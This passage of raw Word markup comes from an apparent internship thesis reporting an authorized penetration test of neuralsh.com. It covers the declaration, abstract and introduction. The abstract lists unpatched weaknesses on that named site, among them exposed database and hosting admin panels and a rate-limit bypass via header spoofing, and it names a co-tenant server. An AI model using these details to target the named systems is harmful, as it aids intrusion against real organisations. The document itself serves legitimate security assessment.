        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Secure Sockets Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Transmission Control Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Transport Layer Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Uniform Resource Locator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>VAPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerability Assessment and Penetration Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web Application Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web Host Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>XFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>X-Forwarded-For (HTTP header)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11905" w:h="16837"/>
          <w:pgMar w:top="1133" w:right="1133" w:bottom="1133" w:left="1700"/>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>VULNERABILITY ASSESSMENT AND PENETRATION TESTING (VAPT) ON A WEB APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>A Case Study of neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Declaration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>I declare that this thesis is my own work and has been carried out with full written authorization from the owner of the target system. All penetration testing activities described herein were conducted ethically, responsibly, and within the agreed scope of engagement. No unauthorized access was attempted against any system not explicitly listed in this document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This thesis presents a comprehensive Vulnerability Assessment and Penetration Testing (VAPT) engagement conducted on neuralsh.com, an AI-powered neural search platform. The assessment was authorized in writing prior to testing, and all activities were conducted in accordance with established ethical hacking standards and the OWASP Testing Guide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The assessment followed the complete penetration testing lifecycle: reconnaissance, scanning, enumeration, exploitation, post-exploitation, and reporting. A black-box methodology was applied as the primary testing approach, simulating an external attacker with no prior knowledge of the target system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The findings reveal significant and immediate security risks across the platform. Twenty (20) distinct vulnerabilities were discovered: 4 Critical, 5 High, 7 Medium, and 4 Low severity findings. Critical findings include a publicly exposed MySQL database, MikroTik network router administration panel, cPanel hosting control panel, and WHM root server administration panel — all accessible from the public internet without IP restriction. A rate-limiting control was successfully bypassed via HTTP header spoofing, enabling unlimited API token generation. A follow-up verification scan conducted on 10 June 2026 confirmed all original findings remained unpatched and identified three additional findings: newly exposed cPanel service ports (2078, 2091), SMTP port 25 transitioning from filtered to open, and confirmed identification of a named co-tenant (onesala.com) sharing the same physical server infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This thesis documents the complete methodology, evidence, exploitation results, risk analysis using CVSS v3.1 scoring, and a full remediation roadmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Keywords: Penetration Testing, VAPT, Web Application Security, OWASP, Rate Limiting Bypass, JWT Analysis, cPanel Exposure, MikroTik, Black Box Testing, CVSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Concepts of Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. Research Methodology and Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. Implementation and Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. Results, Analysis and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+ References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+ Appendices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 1: PROJECT OVERVIEW AND ORGANIZATIONAL CONTEXT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To begin this internship, it is important to lay out the foundation of the project — what was worked on, why it matters, and how the work was planned and carried out. This chapter introduces the project description, the problem that motivated it, the objectives set out at the start, the solutions proposed, the project scope, the action plan followed throughout the internship period, and a description of the organization where this internship was completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Project Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship project focused on enhancing the security posture of a live web application by conducting a structured Vulnerability Assessment and Penetration Testing (VAPT) engagement on neuralsh.com, an AI-powered neural search platform. The assessment was carried out under the supervision of Prestige Alliance Co., Ltd., which authorized and oversaw all testing activities in accordance with ethical hacking standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The project involved scanning the target's external IP infrastructure, analyzing identified weaknesses, performing manual and automated testing across the application and network layers, and producing a formal security report detailing all findings, their severity, and recommended remediation steps. A total of 20 vulnerabilities were discovered — including 4 Critical, 5 High, 7 Medium, and 4 Low severity findings — with two attack chains successfully exploited under controlled conditions. A follow-up verification scan on 10 June 2026 confirmed all original findings remained unpatched and uncovered three additional findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This work reflects the real-world responsibilities of a security intern: not only finding vulnerabilities, but understanding their impact, communicating risk clearly, and helping the organization take meaningful steps toward a stronger security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Over the past several years, cybercrime has escalated at a pace that has outstripped the security readiness of many organizations worldwide. What was once considered a concern limited to large enterprises has become a daily reality for businesses of every size. The numbers tell a stark story.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>According to the Verizon 2025 Data Breach Investigations Report, web application attacks accounted for over 43% of all recorded data breaches globally — making them the single largest attack vector for the third consecutive year. The average cost of a data breach reached USD 4.88 million in 2024, a figure that continues to climb. Ransomware attacks surged by 37% year-over-year, with Southeast Asian targets increasingly appearing in threat intelligence reports from Mandiant and CrowdStrike.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>By 2026, the threat landscape has grown more sophisticated. Attackers are now using artificial intelligence to automate reconnaissance, generate tailored phishing content, and discover misconfigurations at scale — dramatically reducing the time between vulnerability publication and active exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) reported in early 2026 that the average time from vulnerability disclosure to exploitation in the wild had dropped to under 48 hours for critical findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In the Southeast Asian region, the situation is particularly pressing. Cambodia, along with neighboring countries, has experienced a sharp rise in targeted attacks against small and medium-sized technology companies. Many of these businesses have embraced rapid digital growth without a corresponding investment in security fundamentals. Web applications are deployed with default configurations, administrative panels left exposed on the public internet, and authentication systems built without rate limiting or input validation — the exact conditions that make exploitation trivially easy for even low-skilled attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship directly addressed one such environment. The target system, neuralsh.com, exhibited multiple critical misconfigurations that, if left unaddressed, would have allowed an unauthenticated attacker to gain administrative control over the entire hosting infrastructure within minutes of discovering the origin IP address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The internship objective is guided by the advisor and supervisor at Prestige Alliance Co., Ltd. to identify, analyze, and address system weaknesses and vulnerabilities in neuralsh.com. The process followed the agreement of the penetration tester and stakeholder before performing the penetration testing. For this internship, the following objectives were accomplished:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform vulnerability scanning on the external web application neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Analyze the vulnerabilities, weaknesses, and propose solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Set up the testing environment and select the appropriate tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform penetration testing on the authorized target system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
